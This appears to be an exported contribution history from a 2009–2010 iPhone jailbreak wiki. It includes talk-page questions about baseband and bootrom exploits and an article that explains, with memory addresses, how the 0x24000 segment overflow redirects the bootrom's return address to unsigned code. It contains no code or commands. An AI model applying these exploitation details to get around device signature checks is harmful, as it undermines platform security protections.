Part 1 is online now (slides will follow). Feel free to correct, especially the native english speakers, as there are some strange statements. Also the links may be improved perhaps. -- [[User:Http|http]] 22:48, 18 July 2010 (UTC)

this is great :D --[[User:Paul0|paulzero]] 13:15, 4 August 2010 (UTC)

== Presentation file ==

To MuscleNerd: can you make the presentation file available? Can't read the slides in the Vimeo video. Thanks * -- [[User:DecoDe|DecoDe]]

To DecoDe: I have an FLV file of it I can upload tomorrow, if someone hasn't done it before me by then. -- [[User:MaybachMan|MaybachMan]] 21:06, 14 July 2010 (UTC)

See the new article page. All conference recordings are there, but the slides are still missing. -- [[User:Http|http]] 22:36, 14 July 2010 (UTC)

The H264 video link lacks audio. Should we make a note of that or something? [[User:MaybachMan|MaybachMan]] 07:52, 15 July 2010 (UTC)

No. Audio is included. But you need the right codecs. I know that it's quite difficult to get such old codecs working nowadays. -- [[User:Http|http]] 09:18, 15 July 2010 (UTC)

It looks like [[planetbeing]] [http://twitter.com/planetbeing/status/18779415819 lost the slides]. I'm waiting for an answer from [[User:MuscleNerd|MuscleNerd]] or [[pytey]] now (to improve image quality). -- [[User:Http|http]] 23:11, 17 July 2010 (UTC)

I'm not sure if we will ever receive the slides in original. Until then I thought I simply add the slides as screenshots from the video, although they are not in very good quality. I have them now on my harddisk. I also already included the first four images in the article. But I'm not sure if I should include all of them, because there are 75 images with a total size of 16MB. Should I include them? Or create a slideshow as PowerPoint or PDF from them and put it onto some public server and just include the link here? What do you think? -- [[User:Http|http]] 00:35, 19 July 2010 (UTC)

Bootrom

2010-08-04T11:55:03Z

Paul0:

==Introduction / old+new==

The bootrom is the first significant code that runs on an iDevice. The bootrom is unwritable. Finding exploits in the bootrom level is a big achievement since Apple won't be able to fix it without a hardware revision.

Often users refer to '''old bootrom''' or '''new bootrom''' devices. The '''new bootrom''' devices were released after [[Timeline#September|9 September 2009]] and have the [[0x24000 Segment Overflow]] fixed. Therefore these newer versions of the [[N72ap|iPod touch 2G]] and [[N88ap|iPhone 3GS]] are not vulnerable to this exploit and had only a [[tethered]] [[jailbreak]]/[[unlock]] until [[Spirit]] came out. Currently, these devices can be jailbroken on iOS 4.0 with [[Star]].

Please see also [[IBoot|Apple's stage 2 bootloader]], which also uses the "iBoot" name.

==Check bootrom version==
To find out if you have an old or new bootrom, the easiest way is to look at the serial number. If the 4th and 5th digits are lower than 40, then you probably have an old bootrom. If they are higher than 45, then you probably have a new bootrom. These two digits show the production week. For refurbished phones and for numbers inbetween, the result is undefined and you have to make the following exact check.

To check your device's bootrom version, you must put your device into [[DFU]] mode. Make sure it is '''not''' in [[Recovery Mode]], as Recovery Mode does not mention the bootrom version. If you have Mac OS X, go to System Profiler, and under the "Hardware" category, go to USB, and click on "Apple Mobile Device (DFU Mode)." If you have Windows, go to Device Manager, find USB controller, subitem Apple Mobile Device USB Driver. In Properties, Details, select Device Instance Path in the dropdown. The end of the info string will show the bootrom version.

== Revisions ==
===[[S5L8900]], used in the [[M68ap|iPhone]], [[N45ap|iPod touch 1G]], and [[N82ap|iPhone 3G]]===

===[[S5L8720]], used in the [[N72ap|iPod touch 2G]]===
* [[iBoot-240.4]] "old bootrom"
* [[iBoot-240.5.1]] "new bootrom"

===[[S5L8920]], used in the [[N88ap|iPhone 3GS]]===
* [[iBoot-359.3]] "old bootrom"
* [[iBoot-359.3.2]] "new bootrom"

===[[S5L8922]], used in the [[N18ap|iPod touch 3G]]===
* [[iBoot-359.5]]

===[[S5L8930]], used in the [[K48ap|iPad]] and in the [[N90ap|iPhone 4]]===
* [[iBoot-574.4]]

Talk:AT+XEMN Heap Overflow

2009-11-04T10:40:02Z

Paul0: /* exploit explanation */ new section

Don't you think that public discussion of this vulnerability will allow Apple to fix it in the upcoming update and make all this discussions totaly useless? --[[User:Redart|Redart]] 16:34, 28 October 2009 (UTC)
:Apple will fix it because iH8sn0w disclosed it, not because we are discussing it here. --[[User:Oranav|oranav]] 17:28, 28 October 2009 (UTC)
:Besides, there is a big install base using the affected baseband. The faster this is converted into a soft unlock, the better. [[User:Haldo|Haldo]] 19:43, 28 October 2009 (UTC)

== exploit explanation ==

geohot, can you explain how the exploit works? heap chunk pointer overwrites?

User:Paul0

2009-03-13T11:27:11Z

Paul0:

I know:<br>
c,php,html,perl,etc.<br>
buffer overflows (heap and stack, pointer overwrites)<br>
x86 assembly<br>
a bit of reverse engineering<br>
<br>
I am a computer nerd.<br>
I use ollydbg.<br>

User:Paul0

2009-03-13T11:26:16Z

Paul0:

I know:<br>
c<br>
buffer overflows (heap and stack, pointer overwrites)<br>
x86 assembly<br>
a bit of reverse engineering<br>
<br>
I am a computer nerd.<br>

User:Paul0

2009-03-13T11:25:58Z

Paul0:

I know:
c<br>
buffer overflows (heap and stack, pointer overwrites)
x86 assembly
a bit of reverse engineering

I am a nerd.

User:Paul0

2009-03-13T11:25:33Z

Paul0:

I know:-
c-
buffer overflows (heap and stack, pointer overwrites)-
x86 assembly-
a bit of reverse engineering-
-
I am a nerd.-

User:Paul0

2009-03-13T11:25:14Z

Paul0:

I know:
----

c
buffer overflows (heap and stack, pointer overwrites)
x86 assembly
a bit of reverse engineering

I am a nerd.

Talk:0x24000 Segment Overflow

2009-03-13T11:23:25Z

Paul0:

I have questions.
What is the LR?
How do we write to the NOR?

LR is the link register. it usually contains a pointer to where the current routine is to return to.
NOR is written by putting the device into dfu mode and writing to the nor0 block device using a tools like iRecovery
--[[User:Posixninja|posixninja]] 17:58, 12 March 2009 (UTC)

I rewrote the article as one geared more toward the technical/security community than hobbyists trying to manually perform the patch. My hope is that it will be more useful in this form for the linux4nano community, who are trying to jailbreak the iPod Nano 4G, which apparently uses the same SoC. --[[User:Planetbeing|Planetbeing]] 07:46, 13 March 2009 (UTC)

Nice work guys. Did you use a debugger of some sort? this would be difficult without a debugger. Here's how I understand it, so we overwrite pointers pointing to where and what data is written. By writing to the stack, we can overwrite the subroutine's return address(LR). The subroutine will now return to the payload. Is this correct?--[[User:Paul0|paulzero]] 11:23, 13 March 2009 (UTC)

User:Paul0

2009-03-13T11:22:59Z

Paul0: New page: I know: c buffer overflows (heap and stack, pointer overwrites) x86 assembly a bit of reverse engineering

I know:
c
buffer overflows (heap and stack, pointer overwrites)
x86 assembly
a bit of reverse engineering

Talk:Ultrasn0w

2009-03-13T06:24:29Z

Paul0: /* more info needed */

== Darkmen's analysis ==

This analysis is somewhat incomplete, as it leaves out stage 2 of the injector that performs the hex to binary conversion for the payload. As it stands, the comment for offset 4 of the "Code loader" (internally called "stage 1" of the injector), the one that says "at-handler buffer where StrToHex result of the at-command is" is incorrect. The reason for the error is probably that the reverse engineer used "strings" on the yellowsn0w executable to find the injected payload of yellowsn0w and since the injector's stage 2 is in binary (the contents of memory at 0x40159FBF is thus ready-to-execute binary code, albeit misaligned), "strings", therefore, would not have yielded the code for stage 2. Overall, though, my cursory examination seems to indicate that the rest of the analysis (of the "meat" of the thing) is fairly accurate and commendable. :)

--[[User:Planetbeing|Planetbeing]] 23:12, 8 January 2009 (UTC)

Its true. I just took the at-string from the iphone wiki post ;) Anyway, my point was to get main idea

--[[User:Darkmen|Darkmen]] 07:31, 9 January 2009 (UTC)

My bad man, I copied and pasted it from IDA (along with converting what it converted to a string to hex). I didn't realize there was more :P

--[[User:ChronicDev|ChronicDev]] 12:05, 9 January 2009 (UTC)

== Geohot's commentary ==

Thinking about this, I know how I could've done the unlock. I'm so lazy. This might be what yellowsn0w does already; theres a little object code in your source, so I don't know :-)

1. copy task_sim into memory
2. patch task_sim in the usual way(too bad i don't really understand the baseband at all)
3. modify the nucleus task struct to use the in memory task_sim(although idk why theres no execute on the stack, normal ram seems ok)
4. reset the sim card

no real reversing required. i could've had this in july dammit :-P

i also think this approach might solve some peoples problems with it dying after 10 minutes

~geohot

== Payload vs injection vector ==

I edited the page in a way I felt was more accurate. Geohot deserves massive props for finding the vuln in 2.28, and maybe there should be a separate "iPhone 3G Unlock" page that notes that more prominently (noting the 2.2 unlock was dev team's payload with geohot's vuln), but yellowsn0w IS the payload and it doesn't make sense to give separate credits on this page for the injection vector.

I don't know much about how yellowsn0w works myself, but I understand it took a lot of careful reverse engineering of the Nucleus OS and baseband tasks in order to pull off, so the payload honestly doesn't take the backseat to the vuln in this case.

--[[User:Planetbeing|Planetbeing]] 16:47, 3 January 2009 (UTC)

== nx ==

heh, I think it is a standard thing for ARM for the stack to be nx. btw, of course there was reversing required, how else would you have found the injection hack itself x)

== About AT+STKPROF exploit ==

Does only 2.28 vulnerable to at+stkprof exploit?

== RE: About AT+STKPROF exploit ==

afaik all versions 1.45 through 2.28 are vulnerable, but devteam only designed a payload for 2.28. not 100% on that though.

== more info needed ==

because of my inability to understand ARM, I have questions: what addresses are patched? how exactly does it patch? why is it calling NU_Receive_From_Mailbox()?--[[User:Paul0|paulzero]] 06:24, 13 March 2009 (UTC)

Talk:Pwnage 2.0

2009-03-13T06:24:29Z

Paul0:

can anyone post the file structure for the certificate and the malformed certificate?--[[User:Paul0|paulzero]] 06:24, 13 March 2009 (UTC)

0x24000 Segment Overflow

2009-03-13T06:20:56Z

Paul0: /* Prerequisites */

Also known by it's codename, "24kPwn", this was the first exploit in the [[S5L8720]] that allowed us to bypass the bootrom signature checks on [[LLB]] and create what is known as an [[untethered jailbreak]].

==Note==
It is unclear how, but the company "NitroKey" is selling this. We were planning on holding back for the new iPhone (which subsequently could mean an iPod 3G as well), but now that they are profiteering off of this we would like to explain exactly how this works as soon as possible so people do not have to pay for it. I apologize if the wording is odd, as I wrote it up a little while ago, planning to post it this summer.

==Credit==
chronic, CPICH, ius, planetbeing, pod2g, posixninja, and co.

==Exploit==
The address that the bootrom loads [[LLB]] into is 0x22000000, and for some reason, it stores it's global variables dangerously close, at 0x22024000. Now, when loading [[LLB]] from [[NOR]], it does not have any sort of maximum size limit, (unlike if it was receiving a file via USB). With an LLB with a size greater then 0x24000, you can gracefully overwrite, and change many of these global variables. Although, for some parts, you may need to reconstruct, with the original data. There are a few different ways you could exploit this to actually run unsigned code at this level. So far the easiest one found is based on another fail decision that Apple made. For some reason, they put the SHA1 hardware address array smack dab in our way. By changing the address at SHA1 Data Input Register 1 (LLB @ 0x240fc), bootrom will attempt to write whatever should be written into sha1, into whatever address we have specified. So, since we can now write to any location in memory, we specify it to point to and overwrite where the current LR is on the stack (0x2202fe24). Now when bootrom starts to copy data over into sha1 register, instead it will actually be overwriting it's own return address and will put whatever address is at 0x20 of the LLB image in LR. Now just add the address of your payload (that's stored somewhere in the padding preferably) into 0x20 of LLB, and it will be executed! For the payload it's wise to put the original bytes that were in 0x20 back, and to restore the proper sha1 hardware address, as well as clean up the stack a little bit before doing your thing and jumping back into code. Also, another important thing to remember is that you must 1. add 0x22000000 to whatever the offset of your payload is in the file, since that is where it loads LLB in memory, and 2. reverse it for endianess.

==Prerequisites==
Because files sent over USB have a size limitation, one thing that is the ability to flash the [[NOR]] unsigned. This can be done by putting the device into dfu mode and writing to the nor0 block device using a tools like iRecovery.

[[Category:Exploits]]

Talk:0x24000 Segment Overflow

2009-03-13T06:07:05Z

Paul0: Undo revision 3184 by Paul0 (Talk)

Talk:0x24000 Segment Overflow

2009-03-13T06:06:43Z

Paul0: Undo revision 3185 by Paul0 (Talk)

I have questions.
What is the LR?
How do we write to the NOR?
[[User:Paul0|paulzero]]
LR is the link register. it usually contains a pointer to where the current routine is to return to.
NOR is written by putting the device into dfu mode and writing to the nor0 block device using a tools like iRecovery
--[[User:Posixninja|posixninja]] 17:58, 12 March 2009 (UTC)

Talk:0x24000 Segment Overflow

2009-03-13T06:03:29Z

Paul0:

I have questions.
What is the LR?
How do we write to the NOR?
--06:03, 13 March 2009 (UTC)~~
LR is the link register. it usually contains a pointer to where the current routine is to return to.
NOR is written by putting the device into dfu mode and writing to the nor0 block device using a tools like iRecovery
--[[User:Posixninja|posixninja]] 17:58, 12 March 2009 (UTC)

Talk:0x24000 Segment Overflow

2009-03-13T06:02:56Z

Paul0:

Talk:Ultrasn0w

2009-03-12T12:22:04Z

Paul0: /* more info needed */ new section

Talk:Pwnage 2.0

2009-03-12T12:18:42Z

Paul0: New page: can anyone post the file structure for the certificate and the malformed certificate?

can anyone post the file structure for the certificate and the malformed certificate?

Talk:0x24000 Segment Overflow

2009-03-12T12:15:22Z

Paul0: New page: I have questions. What is the LR? How do we write to the NOR?

I have questions.
What is the LR?
How do we write to the NOR?